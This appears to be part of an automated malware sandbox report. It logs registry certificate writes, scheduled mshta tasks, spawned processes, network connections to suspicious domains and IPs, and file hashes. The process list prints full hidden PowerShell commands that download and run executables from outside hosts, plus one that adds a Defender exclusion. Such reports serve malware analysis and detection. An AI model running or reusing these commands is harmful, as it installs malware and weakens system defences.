| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9.exe
"C:\Users\Admin\AppData\Local\Temp\ca7fd0769435cdce93bb15e776809875311762a1a332651b4d44b0cea8f875a9.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn y96vImaIzNT /tr "mshta C:\Users\Admin\AppData\Local\Temp\GDv0q4PXj.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\GDv0q4PXj.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn y96vImaIzNT /tr "mshta C:\Users\Admin\AppData\Local\Temp\GDv0q4PXj.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE
"C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107440101\172cf80232.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\172cf80232.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn BHvs0ma2jIR /tr "mshta C:\Users\Admin\AppData\Local\Temp\IbSyMR0LL.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\IbSyMR0LL.hta
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn BHvs0ma2jIR /tr "mshta C:\Users\Admin\AppData\Local\Temp\IbSyMR0LL.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE
"C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "wpz7BmapgPe" /tr "mshta \"C:\Temp\ZN3XY9qK2.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\ZN3XY9qK2.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10108150101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10108150101\zY9sqWs.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2FA8.tmp\2FA9.tmp\2FAA.bat C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 1036
C:\Windows\system32\taskeng.exe
taskeng.exe {B025328D-7CD3-47A6-9B0D-FFB781F1671E} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
C:\ProgramData\xadikea\lgcr.exe
C:\ProgramData\xadikea\lgcr.exe
C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 1200
C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 1020
C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 500
C:\Users\Admin\AppData\Local\Temp\10108210101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10108210101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1412_133856936166700000\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10108210101\SvhQA35.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\1RTut7w2\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10108230101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10108230101\Ps7WqSx.exe"
C:\Users\Admin\AppData\Local\Temp\10108240101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10108240101\nhDLtPT.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2c69758,0x7fef2c69768,0x7fef2c69778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1084 --field-trial-handle=1700,i,9649217018281244491,4139957170140023625,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1320 --field-trial-handle=1700,i,9649217018281244491,4139957170140023625,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1384 --field-trial-handle=1700,i,9649217018281244491,4139957170140023625,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2284 --field-trial-handle=1700,i,9649217018281244491,4139957170140023625,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2304 --field-trial-handle=1700,i,9649217018281244491,4139957170140023625,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe
"C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 604 -s 1212
C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe
"C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 544
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe
"C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\8y5fk" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 11
C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe
"C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 172.67.192.128:443 | biochextryhub.bet | tcp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| DE | 5.75.210.149:443 | tcp | |
| DE | 5.75.210.149:443 | tcp | |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| DE | 5.75.210.83:443 | tcp | |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| DE | 5.75.210.83:443 | 5.75.210.83 | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\GDv0q4PXj.hta
| MD5 | 84c3f2fbf5c09b1dbbc8b2a8208225f0 |
| SHA1 | ccf5bdfaa478cb47ca36c0946f8fd8770f29d45e |
| SHA256 | 7cf79ed0cfb660cea59a2e6679f65fe5af7eb483ec52e2bace3784136eb119ae |
| SHA512 | 90f17b16e6879a03715e127dab0074a88aa52daca76be203c849c0d820a38213a9106a01eadbe0ea98ab9a2abcc643c9d471899d7fb3a383580f27f7df7b2bf4 |
\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE
| MD5 | 93da4bdbae52d91d32a34c140466e8cf |
| SHA1 | 2177f234160ef77058d2237a8f97c1d663647240 |
| SHA256 | 878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a |
| SHA512 | 14d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a |
memory/2940-13-0x00000000065E0000-0x0000000006AA2000-memory.dmp
memory/2984-14-0x00000000002E0000-0x00000000007A2000-memory.dmp
memory/2984-28-0x0000000007260000-0x0000000007722000-memory.dmp
memory/1424-31-0x0000000000A40000-0x0000000000F02000-memory.dmp
memory/2984-29-0x00000000002E0000-0x00000000007A2000-memory.dmp
memory/2984-33-0x0000000007260000-0x0000000007722000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
| MD5 | 73636685f823d103c54b30bc457c7f0d |
| SHA1 | 597dba03dce00cf6d30b082c80c8f9108ae90ccf |
| SHA256 | 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c |
| SHA512 | 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7 |
memory/1424-55-0x0000000000A40000-0x0000000000F02000-memory.dmp
memory/1424-51-0x0000000000A40000-0x0000000000F02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107440101\172cf80232.exe
| MD5 | b3d63a05370da2f577cb27906fb04aee |
| SHA1 | 0c244ec575940a4096e9b45b86cbaf076ccf77d5 |
| SHA256 | 03dec6ff77c2d20dced89d81ed93dafec1f93e2729af7b5892e3b24a411a18fe |
| SHA512 | 594c22d34161def7241f3686c35e42c30e7ce63ed733808c344cbb397227bbf8e06c05f9bd3631a2b682a8554015d3ef96468b28bb56ad94f412bd16a8ff6d2f |
C:\Users\Admin\AppData\Local\Temp\IbSyMR0LL.hta
| MD5 | 3b5efb5541fb93c1aa04f73f0e6f7b55 |
| SHA1 | dc7c1d43b50d59b9052d4a7986c305897f688db7 |
| SHA256 | 8909772395d431e128ce8e45a04ac0a028910964ba517338968112f9d721d126 |
| SHA512 | 89f2bd1a514320789a9382d9567f7bb39e6a8ae099c06608f6ff5fd2e735b5cc2d9e1225cd384e75adfaccab2c9323c560d2cba56a021f2a05ff7e2d84550a00 |
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
| MD5 | 1dc908064451d5d79018241cea28bc2f |
| SHA1 | f0d9a7d23603e9dd3974ab15400f5ad3938d657a |
| SHA256 | d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454 |
